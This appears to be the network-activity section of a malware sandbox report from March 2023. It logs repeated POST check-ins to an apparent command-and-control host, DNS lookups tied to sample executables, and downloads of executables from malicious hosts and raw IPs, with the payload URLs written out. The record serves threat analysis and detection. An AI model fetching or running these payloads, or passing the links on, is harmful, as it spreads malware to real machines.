                                    Server: cloudflare
                                    CF-RAY: 7aa2d9eea94ab83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://vngwsmeto.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 304
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:07:56 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UX6ews1J7DZM31XGL%2B3DwSKrofLOjTxKdc0ZsIVxvHpst0K7AYwxPkx1LqCNuzrjMm%2F5UOs861CRZJbHTBEwUniLrvWUOV%2FM5gwjKNGU5qV%2FIqlHnH6PczgWR4RWx2XS"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2d9ef4991b83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://wwoceg.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 120
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:00 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WdEVTvDlMisU0VqiejEWyvvvaNYMTOG5jA7D%2Fi45oXpzsw1mhsDcclRb01i6Wl27eI%2FVXOvANHW3T3ZPpVYVm9yH%2BMRuAO%2BaQlAyt442JohE4SLBOoUZJkJW9cUUTatk"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da0a5b2cb83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://wnvigcmog.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 306
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:00 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LLF8P0GApdJM3U47g1y1ui9R1bmwj%2FAY48EdvrXQ9y%2BI5JvWQxyXcDiQgJkYKKnDFnRIXqBvg9g8fzc%2BdCL6cQU4xKkvT4ofWg6cSttOLhGm7jcEr3hJBQB6xLYl8uAN"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da0b1b76b83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://ywsbbfhl.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 324
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:01 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HICfSh0X%2FVqRoKd974sGVwrl5lJhibTv0TLn7VsDqyNGG%2BNUpQBQ8fEmd%2F%2FZytUCI9nH56khHNA2kIE58otsgKik930xDY2ogjCnlZhWbmYWbXuh8iEcZKlHPRDFa9gF"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da0edd1bb83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://rydsedgvt.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 153
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:01 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=N8NgspBL2ciPII%2Fs5rtxeXeM1G7lNE5%2BjL6RV2Upv2NeA0UUmynDR8%2B3TarQS9egS77cPPyWYV7iG1PRJGJG4%2BrN9YsuCPk688d0uicOtDVpcfIBmNCrbb7WFJ%2FvS4Yh"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da0f6d4eb83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://gwgnh.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 308
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:02 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=e2h8CNPJ4Wx568%2Bcz8PNNcuetaJ32gbgWK8knL17%2BRK6M9IhUrUA%2Bvoor6C9K6sJ2pcHYw6Qe7KbyqGW5eU75e1O9etmdl4tAffPEVENbSxohb%2BIiPJpevj8luHR2MR5"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da18f8d7b83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://fkfycmtjdc.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 208
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:02 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5hM7FbfZKuYAgCExo6ypmIGQUJcvWGGXUeQtCGEwPTIYHG5GTk%2FwYRwqArK%2FqkVBdgcAHc6IfNcnJkTOFYQm%2BLxlzAIOmjxFo7Gi8NZ88ELkPr8ifp3OTp5V%2BdG0%2Fcwo"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da199921b83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://ohrnug.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 115
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:03 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MbzOHQUTVolUM0WJgpAtplccMSZyZ8TtjfvK2a3qZ%2Bi5T0QhxII6j8FWm0lPMLzE8K2XO2Bv8Tr7UxRPwmtsBfRAFcYMZ4v4aJgmHIiKU19akBfs8CbKJQnKDZRiSuoK"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da1b99f0b83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://djekqg.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 303
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:03 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ezt9%2Be5DTaotYKwVmdHV51ZkUL%2BlpzReBY7tGvOKfaCqTHBbMRa6k7uOWP%2Fcht9NY1xHsIu1cfXq9q6N8uTlit7T9Cv5DpwAopk0s3e7YAJANNYmwuZ6LGhXc2GX71R3"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da1c5a3ab83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://wnnihgfg.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 171
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:07 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4oACFyu5aMoZOVmMrB0YWXgH9dQMIqCmZ58NCW%2B%2BX%2FyBNk6T6FZj4tFoAkeLvI%2Bu0ahTPBhz%2BwFMMX59tHidGHX5umQdQlzSMNIPVt1yS3VddUtdfvY3unD9qLWDgvV9"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da356b49b83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://hyuaheriv.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 135
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:07 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=U89Ol92iFxM49ETPCS8LBlbXgM%2F5e8JoLvhvIHvGHjPHb3JujpBS9tFVZG8hCTgZaXbNw1kkZfFEV5gcCqv9KnFFkQlH6O64I1yfJvIxfP6NlfZI%2FVWHF4vQCGUZBiR%2F"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da388c4ab83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://yjcorcvm.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 224
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:09 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OMikWuDx1jgiTgfOE5PSx%2FkTqjBCvfXwlstYcXltnz4LMa%2FkbfGR0%2FMArmEUs7mkSNIq5FypGuhO%2FMgtJjDIBtKs6Fi1yABneC3V0UEngrniIJNr9tgkLhMtpeMAqX74"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da45491cb83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://lfustc.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 247
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:10 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ecp%2FlCTLT3%2F78IlJHYrQH8fAAeSrjyqJC5ffHCVj%2BNY2wA6o2ZTBU6BEF4p9GZyWJI7yIxlJqk5R%2Fp%2F%2B%2FyyV21n1unfFzbvcEIakJ37uhhNB2sSucvtraz4C%2FQNVGjys"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da46a9a8b83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://vipfbu.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 114
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:11 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E4djFv6BdIOMa0Q%2B%2BmvShSp6ejAP0za20CVe3PtP4OOU9HklzFsjhLpC8UXhB5BIziOFsiox4W9255qbslYl1wU8SMaKefL8QHDjcBo7Ifs%2FVaKGwJSZd3HPUCYrjOou"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da4c8ba0b83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://luktqsaejj.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 331
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:11 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=x46Dce8BGHpZ65Flgw1%2FATMTqQiP%2FlhYSHwr4OoGV289IxFIcCh8Q7HVaAWC98FXFvKk1AYGOrhJHojrUYJwAl%2BnxWrTmU2qB0wmHD%2BTbwRC93fDKLl2pfVWSr28McTz"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da4dac08b83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://ugxoifnw.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 328
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:11 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FpyNPD1hrfyyDQtY4J3%2FwjFzFS%2BfBmJtaPAPs7WPOWvOPSZGjtQpa%2FeK6ivPWU7IUrQmqzg6fV7WZThIlGotHQxfjHaMwnysgzXEk%2F6ImKRv%2FUCrypFEvl3rCg4AhYAV"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da522d9bb83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://ramjf.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 307
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:12 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fgsF4JtbP%2BPZrii%2FmEM1jLo9B8xAnPJNG1uAlEWeJQd%2BBGI27Bu1MFcQ2TwhYegwqqe2%2BGiObGe%2BrwYgb%2FH6y2bdhYJuED2r7zrJaw1GGqz6GOg8Rv8zahQmw1FoKKT5"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da531defb83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://jmxsrgnexx.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 251
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:12 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QdKwlDcPRulbTQHv9hGBrjVv6zYMlZjhnFPl4Ht5xNocqNniwgKlUGmSV7CQcOc3VKxbDX1avDHa5o3YEPf%2B%2FfcFvxB2P8GOQBtUfCoOXEBmo6HeMkDFBbPMC21172HY"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da57df9db83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    DNS
                                    uaery.top
                                    7C6.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    uaery.top
                                    IN A
                                    Response
                                    uaery.top
                                    IN A
                                    185.95.186.58
                                    uaery.top
                                    IN A
                                    187.170.21.149
                                    uaery.top
                                    IN A
                                    211.40.39.251
                                    uaery.top
                                    IN A
                                    211.104.254.139
                                    uaery.top
                                    IN A
                                    190.229.19.7
                                    uaery.top
                                    IN A
                                    178.30.120.200
                                    uaery.top
                                    IN A
                                    187.224.55.97
                                    uaery.top
                                    IN A
                                    211.119.84.112
                                    uaery.top
                                    IN A
                                    195.158.3.162
                                    uaery.top
                                    IN A
                                    175.120.254.9
                                  • flag-iq
                                    GET
                                    http://uaery.top/dl/build.exe
                                    Remote address:
                                    185.95.186.58:80
                                    Request
                                    GET /dl/build.exe HTTP/1.1
                                    Connection: Keep-Alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Host: uaery.top
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:07:51 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                    Last-Modified: Sun, 19 Mar 2023 04:00:03 GMT
                                    ETag: "c5800-5f738d856a728"
                                    Accept-Ranges: bytes
                                    Content-Length: 808960
                                    Connection: close
                                    Content-Type: application/octet-stream
                                  • flag-us
                                    DNS
                                    144.181.67.172.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    144.181.67.172.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    58.186.95.185.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    58.186.95.185.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-de
                                    GET
                                    http://45.9.74.80/powes.exe
                                    Remote address:
                                    45.9.74.80:80
                                    Request
                                    GET /powes.exe HTTP/1.1
                                    Connection: Keep-Alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Host: 45.9.74.80
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx/1.18.0 (Ubuntu)
                                    Date: Sun, 19 Mar 2023 04:07:59 GMT
                                    Content-Type: application/octet-stream
                                    Content-Length: 1570304
                                    Last-Modified: Thu, 16 Mar 2023 21:53:23 GMT
                                    Connection: keep-alive
                                    ETag: "64138fd3-17f600"
                                    Accept-Ranges: bytes
                                  • flag-us
                                    DNS
                                    api.2ip.ua
                                    7C6.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    api.2ip.ua
                                    IN A
                                    Response
                                    api.2ip.ua
                                    IN A
                                    162.0.217.254
                                  • flag-us
                                    DNS
                                    80.74.9.45.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    80.74.9.45.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    akar.av.tr
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    akar.av.tr
                                    IN A
                                    Response
                                    akar.av.tr
                                    IN A
                                    159.253.45.38
                                  • flag-tr
                                    GET
                                    https://akar.av.tr/tmp/index.php
                                    Remote address:
                                    159.253.45.38:443
                                    Request
                                    GET /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Host: akar.av.tr
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:02 GMT
                                    Server: Apache
                                    Content-Description: File Transfer
                                    Content-Disposition: attachment; filename=c74f0e59.exe
                                    Content-Transfer-Encoding: binary
                                    Expires: 0
                                    Cache-Control: must-revalidate
                                    Pragma: public
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Transfer-Encoding: chunked
                                    Content-Type: application/octet-stream
                                  • flag-us
                                    DNS
                                    bz.bbbeioaag.com
                                    ss31.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    bz.bbbeioaag.com
                                    IN A
                                    Response
                                    bz.bbbeioaag.com
                                    IN A
                                    45.136.113.107
                                  • flag-us
                                    DNS
                                    38.45.253.159.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    38.45.253.159.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    j.ffbbjjkk.com
                                    zyy.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    j.ffbbjjkk.com
                                    IN A
                                    Response
                                    j.ffbbjjkk.com
                                    IN A
                                    172.67.158.22
                                    j.ffbbjjkk.com
                                    IN A
                                    104.21.8.227
                                  • flag-us
                                    GET
                                    https://j.ffbbjjkk.com/2701.html
                                    zyy.exe
                                    Remote address:
                                    172.67.158.22:443
                                    Request
                                    GET /2701.html HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: */*
                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                    Host: j.ffbbjjkk.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:02 GMT
                                    Content-Length: 571255
                                    Connection: keep-alive
                                    Last-Modified: Wed, 08 Mar 2023 18:28:12 GMT
                                    ETag: "8b777-5f667b0cf6700"
                                    Accept-Ranges: bytes
                                    CF-Cache-Status: DYNAMIC
